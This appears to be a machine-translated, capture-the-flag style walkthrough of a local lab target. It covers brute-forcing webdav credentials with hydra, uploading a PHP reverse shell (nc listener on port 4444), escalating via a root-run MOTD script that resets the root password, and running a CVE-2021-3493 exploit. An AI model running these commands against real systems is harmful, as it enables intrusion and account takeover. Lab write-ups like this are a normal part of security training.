当前位置:网站首页>Detailed explanation of the penetration of network security in the shooting range
Detailed explanation of the penetration of network security in the shooting range
2022-04-23 16:49:00 【InfoQ】
0x00 Environment configuration
0x01 The host found / Port scanning
arp-scan -l
nmap -sV -sC -p- 192.168.26.131
0x02 information gathering
dirsearch --url http://192.168.26.131
0x03 Password dictionary customization
cewl http://192.168.26.131 -w 192.168.26.131dict.txt
0x04 hydra Code explosion
hydra -L 192.168.26.131dict.txt -P 192.168.26.131dict.txt 192.168.26.131 http-get /webdav -v
Successfully exploded the account and password , Sure enough, the generated exclusive dictionary is better to use . Because we got webdav Relevant certification information of the service , So next I started using it directly kali Self contained webdav Testing tools davtest To test , See if you can send the file up , If you can , We can directly webshell To the server , In order to getshell Break through the border .
0x05 webdav Loophole
davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg
From the picture above, we can know , We can establish a through the obtained information voucher DAV Connect , And you can create directories and upload files on the target , The only files uploaded to it are txt,php,html Three formats of files can be executed , So here we are getshell There is a way of thinking , Pass a rebound directly shell Of php file , then kali Listen to the local port , Then access this file , Trigger execution getshell.
cp /usr/share/webshells/php/php-reverse-shell.php . # take kali Self rebound shell Copy the file to the current directory
vim php-reverse-shell.php # Edit this file , take ip Change it to kali Of ip Port to kali The port of
davtest -url http://192.168.26.131/webdav -auth yamdoot:Swarg -uploadfile php-reverse-shell.php -uploadloc rev.php
As you can see from the picture above , We have succeeded in rebounding shell The file was uploaded to the target plane , Next kali Listen to the local port , Then access this file , Trigger execution getshell.
nc -lnvp 4444 #kali monitor 4444 port
http://192.168.26.131/webdav/rev.php # Access to this link triggers execution shell Code for
python3 -c "import pty;pty.spawn('/bin/bash')" # Upgrade and optimize shell
0x06 MOTD Injection of power
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
# Command interpretation :
Start from the root directory to find file type The owner is root Ordinary users or groups can perform Other users can write If you find a qualified use ls -l Command display The error message is directed from null
chitragupt
ssh [email protected]
find / -type f -user root -perm -ug=x,o=w -exec ls -l '{}' \; 2>/dev/null
vi /etc/update-motd.d/00-header # Edit this file
echo 'root:123' | chpasswd # Add this line at the end of the file , This line means , Use chpasswd The order will root The user's password is changed to 123
0x07 CVE-2021-3493 Raise the right :
scp exploit.c [email protected]:/home/inferno # take exp Upload to the target
gcc exploit.c -o exploit # Try to compile exploit.c And name the compiled file exploit
chmod +x exploit # to exploit Grant execution permission
./exploit # perform exp
版权声明
本文为[InfoQ]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/04/202204231645272170.html
边栏推荐
- Query the data from 2013 to 2021, and only query the data from 2020. The solution to this problem is carried out
- How does flash cache data in memory?
- RAID磁盘阵列与RAID5的创建
- File upload and download of robot framework
- Dancenn: overview of byte self-developed 100 billion scale file metadata storage system
- 伪分布安装spark
- PostgreSQL列存与行存
- Disk management and file system
- 面试百分百问到的进程,你究竟了解多少
- Solution of garbled code on idea console
猜你喜欢
Nacos 详解,有点东西
Phpstudy V8, a commonly used software for station construction 1 graphic installation tutorial (Windows version) super detailed
详解牛客----手套
How much do you know about the process of the interview
无线鹅颈麦主播麦手持麦无线麦克风方案应当如何选择
Dancenn: overview of byte self-developed 100 billion scale file metadata storage system
[pyGame games] how did angry birds, a mobile game that became popular all over the world 10 years ago, dominate the list? Classic return
Deepinv20 installation MariaDB
Disk management and file system
Gartner announces emerging technology research: insight into the meta universe
随机推荐
Sail soft implements a radio button, which can uniformly set the selection status of other radio buttons
聊一聊浏览器缓存控制
MySQL personal learning summary
Project framework of robot framework
昆腾全双工数字无线收发芯片KT1605/KT1606/KT1607/KT1608适用对讲机方案
1959年高考数学真题
ByteVCharts可视化图表库,你想要的我都有
STM32__ 03 - beginner timer
详解牛客----手套
5分钟NLP:Text-To-Text Transfer Transformer (T5)统一的文本到文本任务模型
Loading order of logback configuration file
Construction of promtail + Loki + grafana log monitoring system
◰GL-着色器处理程序封装
How to choose the wireless gooseneck anchor microphone and handheld microphone scheme
蓝桥杯省一之路06——第十二届省赛真题第二场
Zhimeng dedecms security setup Guide
PostgreSQL列存与行存
Flask如何在内存中缓存数据?
PHP高效读大文件处理数据
Esxi encapsulated network card driver